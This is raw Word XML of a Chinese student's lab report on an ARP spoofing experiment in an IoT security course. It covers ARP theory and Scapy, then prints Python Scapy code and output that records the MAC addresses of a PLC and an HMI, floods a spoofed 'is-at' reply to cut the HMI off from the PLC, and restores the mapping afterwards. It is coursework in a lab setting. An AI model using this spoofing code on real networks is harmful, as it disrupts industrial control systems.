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after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>物联网安全课程实验报告</w:t>
      </w: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28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>四</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59264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1902460</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>66675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1508125" cy="15081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08167" cy="1508167"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>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spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ARP欺骗攻击实验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>姓名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>孙悦</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>小组：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>孙悦 魏莎莎 黄昊</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2110052</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>专业</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>物联网安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>提交日期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2023.11.21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>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实验目的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FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>理解ARP协议及ARP攻击基本原理，学习Python下的网络编程库Scapy的基本使用，并在实验环境中实现ARP攻击，理解保障系统安全的复杂性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>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实验要求及要点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>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分组（1-4人）完成实验内容，单独撰写实验报告，回答问题，且报告内容至少包括如下要点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-27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为什么攻击后需要复原现场？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-27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本实验的攻击效果与实验二中指令攻击的攻击效果有何异同？为什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-27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本实验中的ARP欺骗攻击对实验三中受到加密保护的系统是否有效？为什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-27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简要探讨ARP攻击防范措施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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>要点：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用到的相关工具及编程库简介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实验原理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实验目标与步骤（搭配实验过程照片、截图）</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遇到的问题及解决办法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收获与感悟</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270" w:leftChars="0" w:firstLine="480" w:firstLineChars="0"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>指令攻击源代码</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Style w:val="2"/>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>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实验内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>使用Python Scapy对工控试验箱PLC进行ARP攻击实验，达到拒绝服务攻击效果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>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发送ARP请求包确认并记录PLC和HMI的MAC地址与IP地址，以备后面恢</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>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复（十分重要：攻击后需要将IP与MAC地址改成与正确缓存一致）。注：192.168.1.4是HMI上位机地址，192.168.1.3是PLC。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>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利用ARP欺骗攻击，使得HMI无法控制PLC，达到拒绝服务攻击效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>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比较与实验二中拒绝服务攻击效果的差异</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-480" w:leftChars="0" w:firstLine="480" w:firstLine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复原现场。（发包将IP和MAC地址对应关系改回去，使PLC能正常工作）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLineChars="0"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（可选）使用Python Scapy对实验三设计的智能家居系统尝试进行ARP攻击，达到拒绝服务攻击效果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（可选）基于双向ARP欺骗实现中间人攻击，分析上位机与PLC通信流量，并对上位机开展数据欺骗攻击，达到HMI显示与实际硬件显示不一致的效果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore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实验原理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ARP 和ARP欺骗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ARP 从网络层使用的 IP 地址，解析出在数据链路层使用的硬件地址。每一个主机都设有一个 ARP 高速缓存 (ARP cache)，里面有所在的局域网上的各主机和路由器的 IP 地址到硬件地址的映射表。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当主机 A 欲向本局域网上的某个主机 B 发送 IP 数据报时，就先在其 ARP 高速缓存中查看有无主机 B 的 IP 地址。如有，就可查出其对应的硬件地址，再将此硬件地址写入 MAC 帧，然后通过局域网将该 MAC 帧发往此硬件地址。如没有， ARP 进程在本局域网上广播发送一个 ARP 请求分组。收到 ARP 响应分组后，将得到的 IP 地址到硬件地址的映射写入 ARP 高速缓存。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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4914900" cy="22860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4914900" cy="2286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ARP欺骗攻击：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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4940935" cy="2357120"/>
            <wp:effectExtent l="0" t="0" r="2540"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4940935" cy="23571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中，我们已知PLC（相当于上图主机B）和HMI（相当于上图主机A）的IP地址，通过编写的代码获取PLC和HMI的MAC地址，然后冒充PLC向HMI发送ARP响应（相当于上图中的主机X）,从而使PLC无法接收到HMI的控制，达到拒绝服务的效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编程库Scapy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Scapy是一个 Python程序，它允许用户发送、嗅探、分析和伪造网络包。这种能力允许构建能够探测、扫描或攻击网络的工具。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capy是一个强大的交互式包操作程序。它能够伪造或解码大量协议的数据包，在网络上发送它们，捕获它们，匹配请求和响应，等等。Scapy可以轻松地处理大多数经典任务，如扫描、跟踪、探测、单元测试、攻击或网络发现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore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实验过程</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环境：Windows  Python3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编程工具：pycharm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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使用Python Scapy编写代码，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>对工控试验箱PLC进行ARP攻击实验，达到拒绝服务攻击效果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码如下：</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360" w:lineRule="auto"/>
        <w:textAlignment w:val="auto"/>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scapy.all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记录地址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plc = sr1(ARP(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="AA4926"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>pdst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plc.show()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 ARP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hwtype    = Ethernet (10Mb)</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ptype     = IPv4</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hwlen     = 6</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plen      = 4</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op        = is-at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hwsrc     =  e0:dc:a0:42:47:2b</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psrc      = 192.168.1.3</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hwdst     = 20:7b:d2:3c:3f:bc</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pdst      = 192.168.1.99</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 Padding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load  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"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'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'</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hmi = sr1(ARP(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="AA4926"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>pdst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hmi.show()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 ARP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hwtype    = Ethernet (10Mb)</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ptype     = IPv4</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hwlen     = 6</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plen      = 4</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op        = is-at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hwsrc     =  e0:dc:a0:40:f8:c9</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psrc      = 192.168.1.4</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hwdst     = 20:7b:d2:3c:3f:bc</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pdst      = 192.168.1.99</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 Padding ]###</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load      = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'</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攻击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atk = ARP(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="AA4926"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>psrc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"192.168.1.3"</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hwsrc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"20:7b:d2:3c:3f:bc"</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hwdst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"e0:dc:a0:40:f8:c9"</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"192.168.1.4"</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'is-at'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send(atk</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inter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>=RandNum(</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loop</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恢复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resume = ARP(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="AA4926"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>psrc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"192.168.1.3"</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hwsrc</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"e0:dc:a0:42:47:2b"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hwdst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"e0:dc:a0:40:f8:c9"</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pdst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"192.168.1.4"</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'is-at'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send(resume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inter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>=RandNum(</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loop</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代码运行效果：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
